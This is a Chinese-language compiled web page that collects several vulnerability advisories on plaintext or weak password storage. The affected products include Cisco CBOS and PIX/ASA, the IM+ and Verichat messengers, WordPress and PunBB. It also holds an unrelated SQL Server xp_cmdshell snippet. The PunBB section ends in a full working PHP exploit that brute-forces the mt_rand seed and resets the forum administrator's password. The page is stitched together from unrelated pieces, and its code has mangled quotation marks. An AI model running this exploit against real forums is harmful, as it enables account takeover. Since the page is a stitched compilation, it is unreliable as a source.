下面是小编收集整理的Cisco CBOS口令明文保存漏洞(共含8篇),供大家参考借鉴,希望可以帮助到有需要的朋友。同时,但愿您也能像本文投稿人“zc558shop”一样,积极向本站投稿分享好文章。
本文从受影响系统,不受影响系统,以及详细描述向大家介绍了如何去进行漏洞的补救和处理,相信看过此文会对你有所帮助,
受影响系统:
Cisco 600 系列路由器
- 下列模块是受影响的:627, 633, 673, 675, 675E, 677, 677i ,678
- 如果这些模块正在运行下列CBOS版本,它们是受影响的:
2。0。1, 2。1。0, 2。1。0a, 2。2。0, 2。2。1, 2。2。1a,
2。3, 2。3。2, 2。3。5, 2。3。7, 2。3。8。
不受影响系统:
CISCO CBOS releases 2。3。9
CISCO CBOS releases 2。4。1
CISCO CBOS releases 2。4。2
描述:
Cisco bug ID : CSCdt04882
Cisco 600系列路由器的口令(exec口令和enable口令)以明文方式保存在NVRAM中。同样,如果管理员将配置文件保存在计算机中,此配置文件中也包含明文口令,
任何可以看到路由器配置(通过直接访问路由器或者访问配置文件)的攻击者都可以获取这些口令。
攻击者可以非法访问路由器设备。如果ISP在多个路由器设备上使用相同的口令,这就会造成比较大的安全威胁。
建议:
厂商补丁:
CISCO已经为此发布了一个安全公告以及相应补丁。
安全公告地址:
Cisco Security Advisory: More multiple vulnerabilities in CBOS
http://www。cisco。com/warp/public/707/CBOS-multiple2-pub。html
下列CBOS软件版本已经修复了此漏洞,您可以在CISCO的站点上免费下载。
CISCO CBOS releases 2。3。9
CISCO CBOS releases 2。4。1
CISCO CBOS releases 2。4。2
厂商主页:http://www。cisco。com
受影响系统:SHAPE Services IM+ v3.10 for Pocket PC描述:
IM+是一款即时消息软件,允许用户同时连接到多个即时消息帐号,IM+本地明文用户名口令泄露漏洞
。IM+在处理存储用户名口令时存在漏洞,本地攻击者可能利用此漏洞轻易获取认证信息。
IM+没有使用任何安全措施或加密保护即时消息帐号的用户名和口令。恶意用户可以在Program FilesIMPlus目录下获得implus.cfg文件,然后使用文本编辑器打开该文件,浏览所有帐号信息,包括明文的用户名和口令,
<*来源:Alyena Lyegkaja (contact_removethis@airscanner.com)
链接:marc.theaimsgroup.com/?l=bugtraq&m=115738726703645&w=2
*>
建议:
厂商补丁:SHAPE Services
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.shapeservices.com/en/products/details.php?product=im&platform=none
选择 开始——程序——Microsoft SQL Server——查寻分析器(Query Analyzer)
然后你可以看到如下面的这个窗口:
第一项让你添写SQL的服务器地址,因为我是在自己的机器上测试的,所以就在SQL SERVER:那里写127.0.0.1
在看下面的连接使用(Connection Information):
第一项:Windows身份验证(Use WindowsNT authentication)
第二项:SQL Server身份验证(Use SQL Server authentication)
因为我是在本地操作,所以选择第一项,当然你选择第二项也可以,(注:如果你是3389控制操作那么直接选择第一项就可以省略输入SA和密码验证这一步)然后按确定(OK)即可
然后在那个查询的窗口中输入:if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
然后按F5键命令执行完毕
这个也可以:
第一步执行:use master
第二步执行:sp_dropextendedproc 'xp_cmdshell'
----恢复SHELL: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
受影响系统:PDAapps Verichat v1.30bh描述:
Verichat是一款即时消息软件,允许用户同时连接到多个即时消息帐号,Verichat本地用户名口令泄露漏洞
。Verichat对用户名和口令的存储操作上存在漏洞,本地攻击者可能利用此漏洞轻易获取这些认证信息。
Verichat没有使用任何安全措施或加密保护即时消息帐号的用户名和口令,默认情况下以明文存储到了HKEY_CURRENT_USERSoftwarePDAappsVeriChat,这样攻击者就可以通过第三方软件获取这些信息,
<*来源:Alyena Lyegkaja (contact_removethis@airscanner.com)
链接:marc.theaimsgroup.com/?l=bugtraq&m=115738959027202&w=2
*>
建议:
厂商补丁:PDAapps
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.pdaapps.com/verichat_ppc/
影响版本:
WordPress 2.6.5/WordPress MU 2.7.1
程序介绍:
WordPress是一款免费的论坛Blog系统,
漏洞分析:
WordPress对于使用已有的用户名和不存在用户名的登录尝试会返回不同的结果,这降低了暴力猜测攻击的复杂性;此外在使用口令重置界面请求新口令的时候,对于已有的和不存在的用户名也会返回不同的结果,
解决方案:
厂商补丁:
WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
wordpress.org/
信息来源:
<*来源:Fernando Arnaboldi
链接:marc.info/?l=bugtraq&m=124709299823452&w=2
*>
今天在更改京东密码的时候(忘记密码),看见了提示。请问京东是怎么检测相似密码的?是否保存了明文密码?
[京东是如何检测相似密码的,是否保存了明文密码?]
受影响系统:
Cisco Firewall Services Module 3.1(x) <= 3.1(1.6)
Cisco PIX/ASA 7.1(x) <= 7.1(2.4)
Cisco PIX/ASA 7.0(x) <= 7.0(5)
描述:
Cisco PIX、ASA和FWSM都是非常流行的防火墙设备,提供能够进行状态报文过滤和深层报文检查的防火墙服务,
上述设备所使用的某些软件版本中可能存在bug,在某些环境中会导致未经用户干预便更改了EXEC命令、本地定义用户的口令,以及启动配置中所存储的enable口令。
仅有两种情况可以触发这个软件bug:
软件崩溃,通常是由软件bug所导致的。请注意不是所有的软件崩溃都会导致上述的不良结果。
两个或多个用户在同一设备上同时进行配置更改。无论使用何种方法访问设备(命令行接口[CLI],自适应安全设备管理器[ASDM],防火墙管理中心等),都会触发漏洞。
请注意在通过write memory或copy running-config startup-config命令向存储启动配置的稳定媒介中保存配置时,就会更改启动配置中的口令,
在正常的操作中,如果没有保存所运行的配置,就不会更改启动配置中的口令。
一旦更改了启动配置中的口令,如果EXEC和enable权限的认证依赖于口令或存储在启动配置中的本地帐号的话,则在下一次设备重载后就会将管理员锁定。如果使用AAA服务器(RADIUS或TACACS+)进行认证的话,则无论是否将LOCAL认证配置为回退(fallback),仅在AAA服务器不可用时更改启动配置中的口令才会导致上述不良结果。
这个软件漏洞可能导致未经用户干预便更改了EXEC口令、本地定义用户的口令和启动配置中的enable口令。如果将认证配置为使用启动配置中所存储的口令的话,这会导致管理员无法登录到设备。
如果恶意用户能够猜测到新口令的话,且重启了设备,无论是由于软件崩溃所导致的自动重启还是网络管理员的手动重启,都可以非授权访问设备。
厂商补丁:
Cisco已经为此发布了一个安全公告(cisco-sa-0823-firewall)以及相应补丁:cisco-sa-20060823-firewall:Unintentional Password Modification in Cisco Firewall Products
链接:www.cisco.com/warp/public/707/cisco-sa-20060823-firewall.shtml
出自sebug
PunBB是一款基于PHP的论坛程序,
PunBB的口令重置功能实现上存在漏洞,远程攻击者可能利用此漏洞在特定条件重置用户的口令。
如果用户忘记了口令的话,可使用PunBB的口令重置功能重置。在请求口令重置后,论坛会向用户发送一封邮件,包含有一个新的随机口令以及激活链接,用户必须点击这个链接才能使口令更改生效。
PunBB的口令重置功能使用mt_rand()生成新口令和激活链接,但在初始化马特赛特旋转演算法随机数生成器时使用了0到1,000,000之间的随机数,具体取决于当前的微秒,也就是只有100万个可能的新口令和激活链接。攻击者可以暴力猜测这个有限的区域,判断重置的口令并激活。
/**
* Original : www.winshell.cn/2008-01.txt
* Thanks to Stefan Esser, here's the exploit.
*
* Team : EpiBite
* firefox, petit-poney, thot
* Nous tenons a remercier nos mamans et papas respectifs.
* Let's get a fu*** coffee !
*/
// conf
define('URL', 'localhost/punbb_1-2-16_fr/upload'); // base url
define('EMAIL', 'login_x@epitech.net'); // your email
define('LOGIN', 'login_x'); // your login
define('PASS', '620553.8I73'); // your pass
// Exploit
printf(“--nUrl : %snEmail : %sn--n”, URL, EMAIL);
$h = curl_init();
curl_setopt($h, CURLOPT_URL,
URL.'/userlist.php?username=&show_group=-1&sort_by=registered&sort_dir=ASC&search=Envoyer');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
$s = curl_exec($h);
preg_match('/profile.php?id=([0-9]*)“>([^<]*)', $s, $m);
define('ADMIN', $m[2]);
preg_match('/([0-9]{4})-([0-9]{2})-([0-9]{2})
if (count($m))
define('DATE', mktime(0, 0, 0, $m[2], $m[3], $m[1]));
else
define('DATE', time() - 86400); //just in case, the forum or account just has been created
printf(”Admin : %snDate : %sn--n“, ADMIN, DATE);
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($h, CURLOPT_HEADER, 1);
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
'req_email='.urlencode(EMAIL),
'request_pass=Envoyer')));
preg_match('/mailto:([^”]*)“/', curl_exec($h), $m);
define('ADMIN_MAIL', $m[1]); // Admin email (normally automatically get, set manually if there's problem)
printf(”Admin mail : %sn--n“, ADMIN_MAIL);
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_COOKIE,
'punbb_cookie='.rawurlencode(serialize(array(0 => 2, 1 =>
md5('bite')))));
curl_setopt($h, CURLOPT_HEADER, 1);
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
'req_email='.urlencode(ADMIN_MAIL),
'request_pass=Envoyer')));
$s = curl_exec($h);
preg_match('/Set-Cookie:.*punbb_cookie=([^;]*);/', $s, $m);
$c = unserialize(urldecode($m[1]));
define('MD5_NOT_LOGGUED', $c[1]);
printf(”Md5 not loggued : %sn--n“, MD5_NOT_LOGGUED);
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=in');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($h, CURLOPT_HEADER, 1);
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
'redirect_url=index.php',
'req_username='.LOGIN,
'req_password='.PASS)));
$s = curl_exec($h);
preg_match('/Set-Cookie:.*punbb_cookie=([^;]*);/', $s, $m);
$c = unserialize(urldecode($m[1]));
define('MD5_LOGGUED', $c[1]);
printf(”Md5 loggued : %sn--n“, MD5_LOGGUED);
define('PASS_MD5ED', sha1(PASS));
$chars = array('/', '-', ”“, '|');
for ($p = 0; $p < 86400 * 2; $p++)
{
if (!($p % 300))
echo $chars[($p / 300) % 4].”r“;
if (strcmp(MD5_LOGGUED, md5(substr(md5((int)(DATE + $p)),
-8).PASS_MD5ED)) == 0)
{
define('SEED', substr(md5(DATE + $p), -8));
break;
}
}
printf(”Seed : %sn--n“, SEED);
for ($p = 0; $p < 1000000; $p++)
{
if (!($p % 300))
echo $chars[($p / 300) % 4].”r“;
mt_srand((double)$p);
if (strcmp(md5(SEED.random_pass(8)), MD5_NOT_LOGGUED) == 0)
{
define('SRAND', $p);
break;
}
}
printf(”SRAND : %sn--n“, SRAND);
mt_srand(SRAND);
random_pass(8);
printf(”New password : %sn--n", random_pass(8));
$url = URL.'/profile.php?id=2&action=change_pass&key='.random_pass(8);// Id is set to '2' (the admin's id, but you can change your target)
$h = curl_init();
curl_setopt($h, CURLOPT_URL, $url);
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_exec($h);
function random_pass($len)
{
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
$password = '';
for ($i = 0; $i < $len; ++$i)
$password .= substr($chars, (mt_rand() % strlen($chars)), 1);
return $password;
}
?>
★ 一年级课堂口令
★ 传口令_作文
★ 写清明说明文
★ 花茶保存方法
★ 我是谁说明文
★ udev漏洞提升